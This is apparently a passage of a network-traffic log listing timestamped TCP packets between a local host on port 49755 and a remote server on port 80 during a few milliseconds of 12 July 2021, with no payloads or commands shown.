Jul 12, 2021 10:29:49.692470074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.692488909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.692506075 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.692518950 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.696419001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696455002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696480036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696502924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696526051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696544886 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.696566105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696588039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696604967 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.696630955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696640968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.696661949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696683884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696706057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696734905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696742058 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.696763992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.696778059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696801901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696824074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696837902 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.696861029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696886063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696897030 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.696923971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696933985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.696957111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.696988106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697007895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697036028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697043896 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697062016 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697076082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697099924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697125912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697133064 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697160006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697176933 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697199106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697227001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697254896 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697264910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697289944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697319031 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697326899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697354078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697360992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697386026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697412014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697436094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697457075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697470903 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697493076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697506905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697532892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697557926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697578907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697602034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697623014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697633982 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697638035 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697659969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697669983 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697690964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697710991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697736979 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697761059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697771072 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697798014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697818995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697843075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697849989 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697871923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697896004 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.697906017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697932005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697956085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697976112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.697984934 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698012114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698019028 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698044062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698070049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698076963 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698098898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698112011 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698132992 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698158026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698180914 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698193073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698220015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698242903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698273897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698281050 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698302984 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698318005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698347092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698370934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698396921 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698410034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698426008 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698451042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698477983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698501110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698523045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698535919 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698565006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698573112 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698596001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698618889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698642015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698654890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698678017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698688984 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698709011 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698734999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698743105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698764086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698786020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698807955 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698820114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698846102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698856115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698880911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698908091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698920965 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698945999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698956013 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.698977947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.698997974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699023008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699029922 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.699053049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699064016 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.699089050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699110985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699155092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699166059 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.699186087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699208021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699229002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699238062 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.699255943 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.699265957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699289083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699316025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699323893 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.699364901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.699404001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699465036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699526072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699551105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699584007 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.699604034 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.699763060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699783087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699814081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699841976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699848890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.699872971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699896097 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.699906111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699928999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699951887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.699979067 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.700010061 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.700200081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700223923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700278044 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.700360060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700383902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700407028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700433969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700444937 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.700472116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700483084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.700508118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700531960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700556993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700584888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700591087 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.700609922 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.700623989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700647116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700668097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700684071 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.700705051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700731993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700742960 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.700767994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.700782061 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.700808048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701280117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701342106 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.701370001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701394081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701417923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701459885 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.701489925 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.701503038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701528072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701550961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701571941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701594114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701606035 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.701628923 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.701637030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701659918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701682091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701703072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701713085 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.701742887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701750040 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.701775074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701802969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701809883 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.701832056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701853991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701879978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701884985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.701905012 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.701915026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701937914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.701987028 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.702075005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702436924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702465057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702503920 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702514887 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.702519894 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.702544928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702569962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702591896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702611923 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.702629089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702652931 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702688932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702699900 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.702712059 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.702725887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702748060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702770948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702795029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702805042 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.702831030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702836990 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.702860117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702884912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702894926 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.702917099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.702943087 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.703007936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703082085 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.703316927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703345060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703366995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703391075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703418970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.703428984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703452110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703468084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.703490973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703514099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703531027 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.703551054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703593016 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.703603029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703629017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703659058 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.703902960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703927994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.703954935 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.704111099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704138994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704168081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704174995 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.704197884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704220057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704227924 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.704251051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704272032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704288006 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.704309940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704332113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.704348087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704377890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704391956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.704415083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704438925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704463005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704487085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704495907 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.704518080 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.704528093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704550982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704574108 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704582930 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.704618931 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.704929113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704955101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.704977989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705010891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705023050 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.705045938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705069065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705074072 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.705092907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705115080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705136061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705146074 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.705168009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705179930 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.705200911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705210924 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.705233097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705255985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705279112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705288887 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.705312967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705323935 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.705348015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705373049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705415010 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.705795050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705817938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705841064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705866098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.705876112 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.705899954 CEST	49755	80	192.168.2.3	47.254.186.176
